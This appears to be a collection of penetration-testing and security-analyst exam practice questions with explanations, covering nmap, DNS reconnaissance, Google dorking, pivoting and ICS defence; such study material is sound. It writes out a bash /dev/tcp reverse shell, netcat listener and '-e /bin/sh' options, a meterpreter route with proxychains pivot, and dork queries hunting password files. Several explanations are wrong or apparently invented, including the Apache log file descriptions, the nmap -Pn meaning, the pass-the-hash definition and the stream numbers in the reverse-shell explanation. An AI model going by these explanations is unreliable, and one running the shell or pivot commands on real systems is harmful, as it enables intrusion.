Nameserver (NS) records are used to list the authoritative DNS server for a particular domain. Mail Exchange (MX) records are used to provide the mail server that accepts email messages for a particular domain. Text (TXT) records are used to provide information about a resource such as a server, network, or service in human-readable form. They often contain domain verification and domain authentications for third-party tools that can send information on behalf of a domain name. Service (SRV) records are used to provide host and port information on services such as voice over IP (VoIP) and instant messaging (IM) applications

What remediation strategies are the MOST effective in reducing the risk to an embedded ICS from a network-based compromise? (Select TWO) A. Disabling unused services B. Segmentation C. NIDS D. Patching

Segmentation is the best method to reduce the risk to an embedded ICS system from a network-based compromise. Additionally, you could disable unused services to reduce the footprint of the embedded ICS. Many of these embedded ICS systems have a large number of default services running. So, by disabling the unused services, we can better secure these devices. By segmenting the devices off the main portion of the network, we can also better protect them. A NIDS might detect an attack or compromise, but it would not reduce the risk of the attack succeeding since it can only detect it. Patching is difficult for embedded ICS devices since they usually rely on customized software applications that rarely provide updates.

You are conducting a vulnerability assessment when you discover a critical web application vulnerability on one of your Apache servers. Which of the following files would contain the Apache server's logs if your organization uses the default naming convention? A. http_log B. apache_log C. httpd_log D. access_log

On Apache web servers, the logs are stored in a file named access_log. By default, the file can be located at /var/log/httpd/access_log. This file records all requests processed by the Apache server. The WebSphere Application Server uses the httpd_log file for z/OS, which is a very outdated server from the early 2000s. The http_log file is a header class file in C used by the Apache web server's pre-compiled code that provides the logging library but does not contain any actual logs itself. The file called apache_log is an executable program that parses Apache log files within in Postgres database.

Which of the following secure coding best practices ensures a character like < is translated into the &lt string when writing to an HTML page? A. Session management B. Error handling C. Output encoding D. Input validation

Output encoding involves translating special characters into some different but equivalent form that is no longer dangerous in the target interpreter, for example, translating the < character into the &lt; string when writing to an HTML page. Input validation is performed to ensure only properly formed data is entering the workflow in an information system, preventing malformed data from persisting in the database and triggering the malfunction of various downstream components. Improper error handling can introduce various security problems where detailed internal error messages such as stack traces, database dumps, and error codes are displayed to an attacker. The session management implementation defines the exchange mechanism that will be used between the user and the web application to share and continuously exchange the session ID.

Vulnerability scans must be conducted continuously to meet regulatory compliance requirements for the storage of PHI. During the last vulnerability scan, a cybersecurity analyst received a report of 2,592 possible vulnerabilities and was asked by the Chief Information Security Officer (CISO) for a plan to remediate all the known issues. Which of the following should the analyst do next? A. Wait to perform any additional scanning until the current list of vulnerabilities have been remediated fully B. Place any assets that contain PHI in a sandbox environment and then remediate all the vulnerabilities C. Filter the scan results to include only those items listed as critical in the asset inventory and remediate those vulnerabilities first D. Attempt to identify all the false positives and exceptions, then resolve any remaining items

PHI is an abbreviation for Personal Health Information. When attempting to remediate numerous vulnerabilities, it is crucial to prioritize the vulnerabilities to determine which ones should be remediated first. In this case, there is a regulatory requirement to ensure the security of the PHI data. Therefore, those critical assets to the secure handling or storage of PHI are of the highest risk should be prioritized for remediation first. It is impractical to resolve all 2,592 vulnerabilities at once. Therefore, you should not identify all the false positives and exceptions and then resolve any remaining items since they won't be prioritized for remediation. You should also not wait to perform additional scanning because a scan is only a snapshot of your current status. If it takes 30 days to remediate all the vulnerabilities and do not scan, new vulnerabilities may have been introduced. Placing all the PHI assets into a sandbox will not work either because you have removed them from the production environment and can no longer serve their critical business functions.

An attacker recently compromised an e-commerce website for a clothing store. Which of the following methods did the attacker use to harvest an account's cached credentials when the user logged into an SSO system? A. Pass the hash B. Lateral movement C. Golden ticket D. Pivoting

Pass the Hash (PtH) is the process of harvesting an account's cached credentials when the user logs in to a single sign-on (SSO) system. This would then allow the attacker to use the credentials on other systems, as well. A golden ticket is a Kerberos ticket that can grant other tickets in an Active Directory environment. Attackers who can create a golden ticket can use it to grant administrative access to other domain members, even to domain controllers. Lateral movement is an umbrella term for a variety of attack types. Attackers can extend their lateral movement by a great deal if they can compromise host credentials. Pivoting is a process similar to lateral movement. When attackers pivot, they compromise one central host (the pivot) that allows them to spread out to other hosts that would otherwise be inaccessible.

A cybersecurity analyst is reviewing the logs of an authentication server and saw the following output: login: admin password: P@$$w0rd! login: admin password:C0mpT1@P@$$0rd What type of attack was most likely being attempted by the attacker? A. Credential stuffing B. Impersonation C. Session hijacking D. Password spraying

Password spraying refers to the attack method that takes many usernames and loops them with a single password. We can use multiple iterations using many different passwords, but the number of passwords attempted is usually low compared to the number of users attempted. This method avoids password lockouts, and it is often more effective at uncovering weak passwords than targeting specific users. In the scenario provided, only one or two attempts are being made to each username listed. This is indicative of a password spraying attack instead of a brute force attempt against a single user. Impersonation is the act of pretending to be another person for fraud. Credential stuffing is the automated injection of breached username/password pairs to gain user accounts access fraudulently. This is a subset of the brute force attack category: large numbers of spilled credentials are automatically entered into websites until they are potentially matched to an existing account. The attacker can then hijack the account for their purposes. Session hijacking exploits a valid computer session to gain unauthorized access to information or services in a computer system.

Your company has just hired a contractor to attempt to identify and exploit any network vulnerabilities they could find. This person has been permitted to perform these actions and only conduct their actions within the contract's scope of work. Which of the following will be conducted by the contractor? A. Vulnerability scanning B. Penentration testing C. Hacktivisim D. Social engineering

Penetration testing is the practice of testing a computer system, network, or web application to find security vulnerabilities that an attacker could exploit. Penetration testers only do this with permission of the organization that owns the system, network, or web application and within the bounds of their scope of work. The person will not attempt to exploit a weakness during vulnerability scanning. Social engineering may be used as part of a penetration test, but it does not adequately describe the scenario provided. Hacktivism is when someone is hacking an organization without permission based on their own morals and values.

Dion Training wants to get an external attacker's perspective on its security status. Which of the following services should they purchase? A. Vulnerability scan B. Asset management C. Penetration test D. Patch management

Penetration tests provide an organization with an external attacker's perspective on their security status. The NIST process for penetration testing divides tests into four phases: planning, discovery, attack, and reporting. The penetration test results are valuable security planning tools, as they describe the actual vulnerabilities that an attacker might exploit to gain access to a network. A vulnerability scan provides an assessment of your security posture from an internal perspective. Asset management refers to a systematic approach to the governance and realization of value from the things that a group or entity is responsible for over their whole life cycles. It may apply both to tangible assets and intangible assets. Patch management is the process that helps acquire, test, and install multiple patches (code changes) on existing applications and software tools on a computer, enabling systems to stay updated on existing patches and determining which patches are the appropriate ones.

A security analyst conducts a Nmap scan of a server and found that port 25 is open. What risk might this server be exposed to? A. Open file/print sharing B. Open mail relay C. Web portal data leak D. Clear text authentication

Port 25 is the default port for SMTP (Simple Message Transfer Protocol), which is used for sending an email. An active mail relay occurs when an SMTP server is configured in such a way that it allows anyone on the Internet to send email through it, not just mail originating from your known and trusted users. Spammers can exploit this type of vulnerability to use your email server for their benefit. File/print sharing usually operates over ports 135, 139, and 445 on a Windows server. Web portals run on ports 80 and 443. Clear text authentication could occur using an unencrypted service, such as telnet (23), FTP (20/21), or the web (80).

Which of the following tools provides a penetration tester with PowerShell scripts that can maintain persistence and cover their tracks? A. Responder B. Empire C. Searchsploit D. Powersploit

Powersploit is a series of Microsoft PowerShell scripts that pen testers can use in post-exploit scenarios. Empire (PowerShell Empire) is a post-exploitation framework for Windows devices that allows the attacker to run PowerShell agents without needing powershell.exe. It is commonly used to escalate privileges, launch other modules to capture data, extract passwords, and install persistent backdoors. Searchsploit is a tool included in the exploitdb package on Kali Linux that enables you to search the Exploit Database archive. Responder is a fake server and relay tool that is included with Kali Linux. It responds to LLMNR, NBT-NS, POP, IMAP, SMTP, and SQL queries to possibly recover sensitive information such as user names and passwords.

Which of the following tools provides a penetration tester with the ability to mask their identity and source IP address by sending messages through intermediaries? A. Responder B. Powersploit C. ProxyChains D. Empire

ProxyChains is a command-line tool that enables pen testers to mask their identity and/or source IP address by sending messages through intermediary or proxy servers. Empire (PowerShell Empire) is a post-exploitation framework for Windows devices that allows the attacker to run PowerShell agents without needing powershell.exe. It is commonly used to escalate privileges, launch other modules to capture data, extract passwords, and install persistent backdoors. Powersploit is a series of Microsoft PowerShell scripts that pen testers can use in post-exploit scenarios. Responder is a fake server and relay tool that is included with Kali Linux. It responds to LLMNR, NBT-NS, POP, IMAP, SMTP, and SQL queries to possibly recover sensitive information such as user names and passwords.

Which technique is used with the ProxyChains command to allow a penetration tester to pivot to a new subnet? A. VPN pivoting B. Modifying routing tables C. Port forwarding D. SSH pivoting

ProxyChains is a tool that allows a penetration tester to pivot to a new subnet, but it must be combined with the modification of the penetration tester's routing tables on their machine. For example, assume that the exploited client machine is located in the 192.168.5.0/24 subnet, but you need to access a server in the 10.0.0.0/24 subnet. You would then need to "route add 10.0.0.0 255.255.255.0 1" (1 is the ID of your Meterpreter session). Then, you can run "proxychains <command>" to target the new subnet. For example, "proxychains nmap -sT -Pn -p21,23,25,80,443 10.0.0.5" would perform a Nmap scan of the targeted server in the new subnet by chaining the connections together using a proxy on the localhost.

Your organization's networks contain 4 subnets: 10.0.0.0, 10.0.1.0, 10.0.2.0, and 10.0.3.0. Using nmap, how can you scan all 4 subnets using a single command? A. nmap -Pn 10.0.0.0/25 B. nmap -Pn 10.0.0.0/23 C. nmap -Pn 10.0.0.0,1.0,2.0,3.0 D. nmap -Pn 10.0.0-3.0

The simplest way to scan multiple subnets adjacent to each other is to use the -Pn tells the command to conduct a host-only scan of every IP in this target space without using ping. Using the dash (-) in the IP address means to scan "this network through this network." So, 10.0.0-3.0 will scan every IP from 10.0.0.0 through 10.0.3.255.

You are analyzing the logs of a web server. Consider the following log sample: (SELECT 8610(ELT(6810 == 6810,1)) Based on the logs above, which of the following type of attacks was conducted against this server? A. XML injection B. Directory traversal C. SQL injection D. Cross-site scripting

SQL injection is a code injection technique that is used to attack data-driven applications. SQL injections are conducted by inserting malicious SQL statements into an entry field for execution. For example, an attacker may try to dump the contents of the database by using this technique. A common SQL injection technique is to insert an always true statement, such as 1 == 1, or in this example, 6810 = = 6810. In this case, the SQL injection is evidenced by the SQL statements being sent to the web application hosted by WordPress. XML Injection is an attack technique used to manipulate or compromise an XML application or service's logic. The injection of unintended XML content and/or structures into an XML message can alter the application's intended logic. Cross-Site Scripting (XSS) attacks are a type of injection in which malicious scripts are injected into otherwise benign and trusted websites. XSS attacks occur when an attacker uses a web application to send malicious code, generally in a browser side script, to a different end-user. A directory traversal attack aims to access files and directories that are stored outside the webroot folder. By manipulating variables or URLs that reference files with "dot-dot-slash (../)" sequences and its variations or using absolute file paths, it may be possible to access arbitrary files and directories stored on the file system, including application source code or configuration and critical system files.

Which of the following tools should a penetration tester use to conduct packet manipulation by crafting and sending malformed packets to a network target? A. w3af B. Scapy C. Immunity Debugger D. ScoutSuite

Scapy is a tool used to conduct packet manipulation by crafting and sending malformed packets to a network target. ScoutSuite is an open-source tool written in Python that can be used to audit instances and policies created on multi-cloud platforms, such as AWS, Microsoft Azure, and Google Cloud. Immunity Debugger is a debugger that includes both CLIs and GUIs that can load and modify Python scripts during runtime. The Web Application Attack and Audit Framework (w3af) allows you to identify and exploit a large set of web-based vulnerabilities, such as SQL injection and cross-site scripting.

You have been tasked to create some baseline system images to remediate vulnerabilities found in different operating systems. Before any of the images can be deployed, they must be scanned for malware and vulnerabilities. You must ensure the configurations meet industry-standard benchmarks and that the baselining creation process can be repeated frequently. What vulnerability scanner option would BEST create the process requirements to meet the industry-standard benchmarks? A. Utilizing an authorized credential scan B. Utilizing a known malware plugin C. Utilizing an operating system SCAP plugin D. Utilizing a non-credential scan

Security Content Automation Protocol (SCAP) is a multi-purpose framework of specifications supporting automated configuration, vulnerability and patch checking, technical control compliance activities, and security measurement. It is an industry standard and supports testing for compliance. The other options will not allow for a truly repeatable process since individual scans would occur each time instead of comparing against a known good baseline.

You are currently conducting passive reconnaissance in preparation for an upcoming penetration test against Dion Training. You are reviewing the DNS records for the company and are trying to identify any host or port information for their voice over IP (VoIP) services. Which of the following DNS records should you analyze? A. NS B. TXT C. MX D. SRV

Service (SRV) records are used to provide host and port information on services such as voice over IP (VoIP) and instant messaging (IM) applications. Mail Exchange (MX) records are used to provide the mail server that accepts email messages for a particular domain. Nameserver (NS) records are used to list the authoritative DNS server for a particular domain. Text (TXT) records are used to provide information about a resource such as a server, network, or service in human-readable form. They often contain domain verification and domain authentications for third-party tools that can send information on behalf of a domain name.

You are currently conducting passive reconnaissance in preparation for an upcoming penetration test against Dion Training. You have just read an article on a security blog that described a new VoIP vulnerability and matching exploit that has been released. Which of the following DNS records could you use to find potential VoIP targets for your upcoming engagement? A. NS B. SRV C. MX D. TXT

Service (SRV) records are used to provide host and port information on services such as voice over IP (VoIP) and instant messaging (IM) applications. Mail Exchange (MX) records are used to provide the mail server that accepts email messages for a particular domain. Nameserver (NS) records are used to list the authoritative DNS server for a particular domain. Text (TXT) records are used to provide information about a resource such as a server, network, or service in human-readable form. They often contain domain verification and domain authentications for third-party tools that can send information on behalf of a domain name.

As a newly hired cybersecurity analyst, you are attempting to determine your organization's current public-facing attack surface. Which of the following methodologies or tools generates a current and historical view of the company's public-facing IP space? A. nmap B. Google hacking C. shodan.io D. Review network diagrams

Shodan (shodan.io) is a search engine that identifies Internet-connected devices of all types. The engine uses banner grabbing to identify the type of device, firmware/OS/app type, and version, plus vendor and ID information. This involves no direct interaction with the company's public-facing internet assets since this might give rise to detection. This is also the first place an adversary might use to conduct reconnaissance on your company's network. The nmap scanning tool can provide an analysis of the current state of public exposure but has no mechanism to determine the history, nor will it give the same depth of information that shodan.io provides. Google Hacking can determine if a public exposure occurred over public-facing protocols, but it cannot conclusively reveal all the exposures present. Google hacking relies on using advanced Google searches with advanced syntax to search for information across the internet. Network diagrams can show how a network was initially configured. Unless the diagrams are up-to-date, which they usually aren't, they cannot show the current "as is" configuration. If you can only select one tool to find your attack surface's current and historical view, shodan is your best choice.

A cybersecurity analyst is preparing to run a vulnerability scan on a dedicated Apache server that will be moved into a DMZ. Which of the following vulnerability scans is most likely to provide valuable information to the analyst? A. Port scan B. Network vulnerability scan C. Web application vulnerability scan D. Database vulnerability scan

Since Apache is being run on the scanned server, this indicates a web server. Therefore, a web application vulnerability scan would be the most likely to provide valuable information. A network vulnerability scan or port scan can provide valuable information against any network-enabled server. Since an Apache server doesn't contain a database by default, running a database vulnerability scan is not likely to provide any valuable information to the analyst.

Which technique would provide the largest increase in security on a network with ICS, SCADA, or IoT devices? A. Installation of anti-virus tools B. Use of a host-based IDS or IPS C. User and entity behavior analytics D. Implement endpoint protection platforms

Since ICS, SCADA, and IoT devices often run proprietary, inaccessible, or unpatchable operating systems, the traditional tools used to detect the presence of malicious cyber activity in normal enterprise networks will not function properly. Therefore, user and entity behavior analytics (UEBA) is best suited to detect and classify known-good behavior from these systems to create a baseline. Once a known-good baseline is established, deviations can be detected and analyzed. UEBA may be heavily dependent on advanced computing techniques like artificial intelligence and machine learning and may have a higher false-positive rate. As the name suggests, the analytics software tracks user account behavior across different devices and cloud services. Entity refers to machine accounts, such as client workstations or virtualized server instances, and embedded hardware, such as the Internet of Things (IoT) devices. Traditional technologies include anti-virus tools, host-based IDS and IPS, and endpoint protection platforms.

Following an engagement, the penetration testing team has generated many recommendations for additional controls and items to be purchased to prevent future recurrences. Which of the following approaches BEST describes what the organization should do next? A. Contract an outside security consultant to provide an independent assessment of the network and outsource the remediation efforts B. Conduct a cost/benefit analysis of each recommendation against the company's current fiscal posture C. Immediately procure and install all of them because the adversary may attack at any time D. Create a prioritized list with all of the recommendations for review, procurement, and installation

Since an engagement has just finished, it is important to act swiftly since its results are a point-in-time assessment. The organization should still take a defined and deliberate approach to choosing the proper controls and risk mitigations. Therefore, execution through a rational business management process is the best approach, including creating a prioritized list of recommendations. Once this list has been created, the organization can conduct a cost/benefit analysis of each recommendation and determine which controls and items will be implemented in the network based upon resource availability in terms of time, person-hours, and money. This process does not need to be a long-term study or filled with complexity. Instead, it should be rapidly conducted due to the probability that an attacker may compromise the network using the same vulnerabilities the penetration testing team found in their engagement.

A penetration tester has exploited an FTP server using Metasploit and now wants to pivot to the organization's LAN. What is the best method for the penetration tester to use to conduct the pivot? A. Set the payload to propagate through meterpreter B. Issue the pivot exploit and setup meterpreter C. Reconfigure the network settings in meterpreter D. Create a route statement in meterpreter

Since the penetration tester has exploited the FTP server from outside the LAN, they will need to set up a route statement in meterpreter. Metasploit makes this very simple since it also has an autoroute meterpreter script that will allow us to attack this second network through our first compromised machine (the FTP server) and then create the routes needed.

A hacker successfully modified the sale price of items purchased through your company's website. During the investigation that followed, the security analyst has verified the web server, and the Oracle database was not compromised directly. The analyst also found no attacks that could have caused this during their log verification of the Intrusion Detection System (IDS). What is the most likely method that the attacker used to change the items' sale price? A. SQL injection B. Buffer overflow attack C. Changing hidden form values D. Cross-site scripting

Since there are no indications in the IDS logs, the database, or the server, it is most likely that the hacker changed hidden form values to change the items' price in the shopping cart. A buffer overflow is an anomaly that occurs when a program overruns the buffer's boundary and overwrites adjacent memory locations while writing data to a buffer. Cross-Site Scripting (XSS) attacks are a type of injection in which malicious scripts are injected into otherwise benign and trusted websites. XSS attacks occur when an attacker uses a web application to send malicious code, generally in a browser side script, to a different end-user. SQL injection is a code injection technique used to attack data-driven applications. Malicious SQL statements are inserted into an entry field for execution, such as dumping the database contents to the attacker.

The local electric power plant contains both business networks and ICS/SCADA networks to control their equipment. Which technology should the power plant's security administrators look to implement first as part of configuring better defenses for the ICS/SCADA systems? A. Anti-virus software B. Log consolidation C. Intrusion prevention system D. Automated patch deployment

Since this question is focused on the ICS/SCADA network, the best solution would be implementing an Intrusion Prevention System. ICS/SCADA machines utilize very specific commands to control the equipment and to prevent malicious activity. You could set up strict IPS rules to prevent unknown types of actions from being allowed to occur. Log consolidation is a good idea, but it won't prevent an issue and therefore isn't the most critical thing to add first. Automated patch management should not be conducted, as ICS/SCADA systems must be tested before conducting any patches. Often, patches will break ICS/SCADA functionality. Anti-virus software may or may not be able to run on the equipment, as well, since some ICS/SCADA systems often do not rely on standard operating systems like Windows.

You are currently conducting passive reconnaissance in preparation for an upcoming penetration test against Dion Training. You want to identify any domain names also covered by the organization's digital certificate to include in your assessment. Which of the following should you review to determine any other domains that can use the same digital certificate? A. SAN B. Robots.txt C. CRL D. CSR

Subject alternative name (SAN) is a field in a digital certificate that allows a host to be identified by multiple host names or domain names. Certificates that use a SAN are referred to as a multi-domain certificate. A certificate signing request (CSR) is a Base64 ASCII file generated on the device that needs a certificate and contains information that the certificate authority needs to create the certificate. The certificate revocation list (CRL) is a list of digital certificates that have been revoked before their expiration date and are now considered invalid. A robots.txt file tells search engine crawlers which URLs the crawler should index and access on your site.

Which file on a Linux system is modified to set the maximum number of days before a password must be changed? A. /etc/groups B. /etc/users C. /etc/shadow D. etc/passwd

The /etc/shadow file stores the actual password in an encrypted format (more like the hash of the password) for the user's account with additional properties related to the user password. Basically, it stores secure user account information. All fields are separated by a colon (:) symbol. It contains one entry per line for each user listed in the /etc/passwd file. The last 6 fields provide password aging and account lockout features

Dion Consulting Group was just hired to conduct an engagement against an online training organization located in Germany. Which of the following laws should a penetration tester review before conducting this engagement to ensure the security and confidentiality of the student information processed by the company? A. DPPA B. HIPAA C. GLBA D. GDPR

The General Data Protection Regulation (GDPR) is a regulation created in the European Union that creates provisions and requirements to protect the personal data of European Union (EU) citizens. Transfers of personal data outside the EU Single Market are restricted unless protected by like-for-like regulations, such as the US's Privacy Shield requirements. The Health Insurance Portability and Accountability Act (HIPAA) is a privacy rule that establishes national standards to protect the privacy of individuals' medical records. The Driver's Privacy Protection Act (DPPA) governs the privacy and disclosure of personal information gathered by state Departments of Motor Vehicles. The Gramm-Leach-Bliley Act (GLBA) requires financial institutions to ensure the security and confidentiality of client information and take steps to keep customer information secure.

Which of the following penetration testing methodologies is focused on testing web applications and the people, processes, and technology that support them? A. Open Source Security Testing Methodology Manual (OSSTMM) B. OWASP Testin Guide (OTG) C. Penetration Testing Execution Standard (PETS) D. Information Systems Security Assessment Framework (ISSAF)

The Open Web Application Security Project (OWASP) is an organization aimed at increasing awareness of web security and provides a framework for testing during each phase of the software development process. The OWASP Testing Guide (OTG) provides different steps for the testing process and outlines the importance of assessing the entire organization, including the people, processes, and technology, during a penetration test. The Penetration Testing Execution Standard (PTES) was developed by business professionals as a best practice guide for conducting penetration testing. The PTES contains seven main sections that are used to provide a comprehensive overview of the proper structure of a complete penetration test. The Open Source Security Testing Methodology Manual (OSSTMM) was developed by the Institute for Security and Open Methodologies (ISECOM) and it outlines every area of an organization that needs testing and how to conduct the relevant tests. The Information Systems Security Assessment Framework (ISSAF) is an open-source resource available to cybersecurity professionals. The ISSAF is comprised of documents that relate to penetration testing, such as guidelines on business continuity and disaster recovery along with legal and regulatory compliance.

A coworker is conducting open-source intelligence gathering for an upcoming penetration test against Dion Training. You look over their shoulder and see them enter the following URL, https://www.google.com/search?q=password+filetype%3Axls+site%3Adiontraining.com&pws=0&filter=p. Which of the following is true about the results of this search? (SELECT THREE) A. Find sites related to diontraining.com B. Returns only files hosted at diontraining.com C. Personalization is turned off D. Excludes Microsoft Excel spreadsheets E. All search filters are deactivated F. Returns only Microsoft Excel spreadsheets

The above example searches for files with the name "password" in them (q=password) and (+) have a filetype equal to xls (filetype%3Axls, %3A is the hex-code for ':') and (+) limits the results to files hosted on diontraining.com (site%3Adiontraining.com) and (&) disables personalization (pws=0) and (&) deactivates the directory filtering function (filter=p). If you wanted to exclude Microsoft Excel spreadsheets, this would be done by typing -filetype%3Axls as part of the search query. To find related websites or pages, you would include the "related:" term to the query. To deactivate all filters from the search, the "filter=0" should be used. To deactivate the directory filtering function, the "filter=p" is used.

A penetration tester just entered the following command into a Bash shell on Dion Training's server: bash 1>& /dev/tcp/192/168.1.53/31337 0>&1 Before the penetration tester runs that command, what must they run first on their machine? A. nc 192.168.1.53 31337 B. bash 0>& /dev/tcp/127.0.0.1/31337 1>&0 C. nc -nlvp 31337 D. nc -e /bin/sh 192.168.1.53 31337

The bash command entered by the penetration tester on the Dion Training server is a redirector to send information back to a listener. Therefore, the penetration tester needs to first set up a listener on their machine. This can quickly be done using netcat to set up a listener on port 31337 (nc -nvlp 31337). The bash command says to redirect the standard output (0) to a TCP socket connected to the IP (192.168.1.53) over port 31337. Then, the standard input (0) is redirected to the standard output (1). Since Bash treats TCP sockets established using this command as a two-way connection, it allows the penetration tester to gain a remote connection to the server by creating a reverse shell. To maintain persistence, the server could be configured using crontab to run this Bash command every day at a certain time, as well.

A new security appliance was installed on a network as part of a managed service deployment. The vendor controls the appliance, and the IT team cannot log in or configure it. The IT team is concerned about the appliance receiving the necessary updates. Which of the following mitigations should be performed to minimize the concern for the appliance and updates? A. Vulnerability scanning B. Scan and patch the device C. Automatic updates D. Configuration management

The best option here is vulnerability scanning as this allows the IT team to know what risks their network is taking on and where subsequent mitigations may be possible. Configuration management, automatic updates, and patching could normally be possible solutions, but these are not viable options without gaining administrative access to the appliance. Therefore, the analyst should continue to conduct vulnerability scanning of the device to understand the risks associated with it and then make recommendations to add additional compensating controls like firewall configurations, adding a WAF, providing segmentation, and other configurations outside the appliance that could minimize the vulnerabilities it presents.

Dion Consulting Group has recently been awarded a contract to provide cybersecurity services for a major hospital chain in 48 cities across the United States. You are conducting a vulnerability scan of the hospital's enterprise network when you detect several devices that could be vulnerable to a buffer overflow attack. Upon further investigation, you determine that these devices are PLCs used to control the hospital's elevators. Unfortunately, there is not an update available from the elevator manufacturer for these devices. Which of the following mitigations do you recommend? A. Recommend isolation of the elevator control system from the rest of the production network through the change control process B. Recommend immediate replacement of the PLCs with ones that are not vulnerable to this type of attack C. Conduct a penetration test of the elevator control system to prove that the possibility of this kind of attack exists. D. Recommend immediate disconnection of the elevator's control system from the enterprise network

The best recommendation is to conduct the elevator control system's logical or physical isolation from the rest of the production network and the internet. This should be done through the change control process that brings the appropriate stakeholders together to discuss the best way to mitigate the vulnerability to the elevator control system that defines the business impact and risk of the decision. Sudden disconnection of the PLCs from the rest of the network might have disastrous results (i.e., sick and injured trapped in an elevator) if there were resources that the PLCs were dependent on in the rest of the network. Replacement of the elevators may be prohibitively expensive, time-consuming, and likely something that the hospital would not be able to justify to mitigate this vulnerability. Attempting further exploitation of the buffer overflow vulnerability might inadvertently trap somebody in an elevator or cause damage to the elevators themselves.

You are currently conducting passive reconnaissance in preparation for an upcoming penetration test against Dion Training. You want to identify any revoked digital certificates that you may use as part of a phishing campaign. Which of the following should you review to identify user certificates that were revoked before their expiration date? A. SAN B. CRL C. Robots.txt D. CSR

The certificate revocation list (CRL) is a list of digital certificates that have been revoked before their expiration date and are now considered invalid. Subject alternative name (SAN) is a field in a digital certificate that allows a host to be identified by multiple host names or domain names. Certificates that use a SAN are referred to as a multi-domain certificate. A certificate signing request (CSR) is a Base64 ASCII file generated on the device that needs a certificate and contains information that the certificate authority needs to create the certificate. A robots.txt file tells search engine crawlers which URLs the crawler should index and access on your site.

You are working as part of a penetration testing team conducting engagement against Dion Training's network. You have been given a list of targets in a text file called servers.txt. Which of the following Nmap commands should you use to find all the servers from the list with ports 80 and 443 enabled and save the results in a greppable file called results.txt? A. nmap -p80,443 -sL server.txt -oG results.txt B. nmap -p80,443 -sL servers.txt -oX results.txt C. nmap -p80,443 -iL servers.txt -oG results.txt D. nmap -p80,443 -iL servers.txt -oX results.txt

The command (nmap -p80,443 -iL servers.txt -oG results.txt) will only perform a Nmap scan against ports 80 and 443. The -iL option will scan each of the listed server's IP addresses. The -oG option will save the results in a greppable format to the file results.txt while still displaying the normal results to the shell. The option of -sL will only list the servers to scan, but it will not scan them. The option of -oX is for outputting the results to a file in an XML format.

Consider the following file called firewall.log that contains 53,682 lines that logged every connection going into and out of this network. The log file is in the following data format, as shown below with the first two lines of the log file: iptables,INPUT,eth0, IP, IP, 52, 0x00, 0x00, 128, 2242, TCP, 2564, 23 Which of the following commands would display all of the lines from the firewall.log file that contain the destination IP address of 10.1.0.10 and a destination port of 23? A. grep "10.1.0.10," firewall.log | grep "23" B. grep "10\.1\.0\.10\," firewall.log | grep "23" C. grep "10.1.0.10," firewall.log | grep "23$" D. grep "10\.1\.0\.10\," firewall.log | grep "23$"

The easiest way to do this is with a grep command. In Linux, you can chain together commands by piping data from one command's output to serve as the input to another command. In this scenario, you can use grep to find all the lines with the IP address first. Then, you can use the second grep command to find all the lines using port 23. The result is a smaller, filtered list of events to analyze. When using the dot in the IP addresses, you must remember to escape this character. Otherwise, grep treats it as a special character in a regular expression treated as any character (except a line break). Adding the \ before the dot (\.), grep treats it simply as a dot or period. You must also escape the comma for it to be processed properly. The $ after the port number is used to indicate that the number should only be counted as a match if it is at the end of the line. This ensures that we only return the destination ports (DPT) matching 23 and not the source port (SPT).

You are conducting a quick nmap scan of a target network. You want to conduct an SYN scan, but you don't have raw socket privileges on your workstation. Which of the following commands should you use to conduct the SYN scan from your workstation? A. nmap -sS B. nmap -O C. nmap -sX D. nmap -sT

The nmap TCP connect scan (-sT) is used when the SYN scan (-sS) is not an option. You should use the -sT flag when you d not have raw packet privileges on your workstation or if you are scanning an IPv6 network. This flag tells nmap to establish a connection with the target machine by issuing the connect system call instead of directly using an SYN scan. Normally, a fast scan using the -sS (SYN scan) flag is more often conducted, but it requires raw socket access on the scanning workstation. The -sX flag would conduct a Xmas scan where the FIN, PSH, and URG flags are used in the scan. The -O flag would conduct an operating system detection scan of the target system.

You have just run the following commands on your Linux workstation: # more Names.txt DION DIOn DIon Dion dion #grp -i DION Names.txt Which of the following options would be included as part of the output for the grep command issued? (Select ANY that apply) A. DIOn B. DIon C. DION D. Dion E. dion

The grep (global search for regular expressions and print) is one of Linux's powerful search tools. The general syntax for the grep command is "grep [options] pattern [files]. The command searches within the specified files (in this case, the Names.txt file). When the command is issued with the -i optional flag, it treats the specified pattern as case insensitive. Therefore, all uppercase and lowercase variations of the word "DION" will be presented from the file and displayed as the command output. By default, grep uses case sensitivity, so "grep DION Names.txt" would only display the output as "DION" and ignore the other variations. As a cybersecurity analyst, grep is one of your most important tools. You can use regular expressions (regex) to quickly find indicators of compromise within your log files using grep.

You are currently conducting passive reconnaissance in preparation for an upcoming penetration test against Dion Training. You want to identify any web pages that contain the term "password" and whose URL contains diontraining.com in the hyperlink displayed on the page. Which of the following Google hacking queries should you use? A. password inurl:diontraining.com B.password site:diontraining.com C. password inanchor:diontraining.com D. password link:diontraining.com

The inanchor modifier is used to search for any pages whose anchor text includes the specified term and has the search term provider somewhere on the page. For example, password inanchor:diontraining.com would return only page results that contain diontraining.com in the anchor text and have the search term "password" anywhere on the page. The link modifier is used to search for any pages that link to the website provided and have the search term anywhere on the page. For example, password link:diontraining.com would return only page results that link to Dion Training's website and have the text "password" anywhere on the page. The inurl modifier is used to search for any pages whose URLs include the term specified and have the search term anywhere on the page. For example, password inurl:diontraining.com would return only page results whose URLs include the text "diontraining.com" and have the text "password" somewhere on the page. The site modifier is used to search only the specified website for results that contain the search term. For example, password site:diontraining.com would return only results for the word password on pages located on the Dion Training website.

You are currently conducting passive reconnaissance in preparation for an upcoming penetration test against Dion Training. You attempted to run a Google hacking query by entering the following search options: "password inurl:diontraining.com". Which of the following results might be returned by your search parameters? A. https://www.dionsolutions.org/passwd B. https://www.passworddumps.com/diontraining C. https://www.jasondion.com/diontraining/password D. https://www.comptia.org/diontraining.com

The inurl modifier is used to search for any pages whose URLs include the term specified and have the search term anywhere on the page. For example, password inurl:diontraining.com would return only page results whose URLs include the text "diontraining.com" and have the text "password" somewhere on the page.

You are currently conducting passive reconnaissance in preparation for an upcoming penetration test against Dion Training. You want to identify any web pages that contain the term "password", and a link to diontraining.com. Which of the following Google hacking queries should you use? A. password inurl:diontraining.com B. password inanchor:diontraining.com C. password site:diontraining.com D. password link:diontraining.com

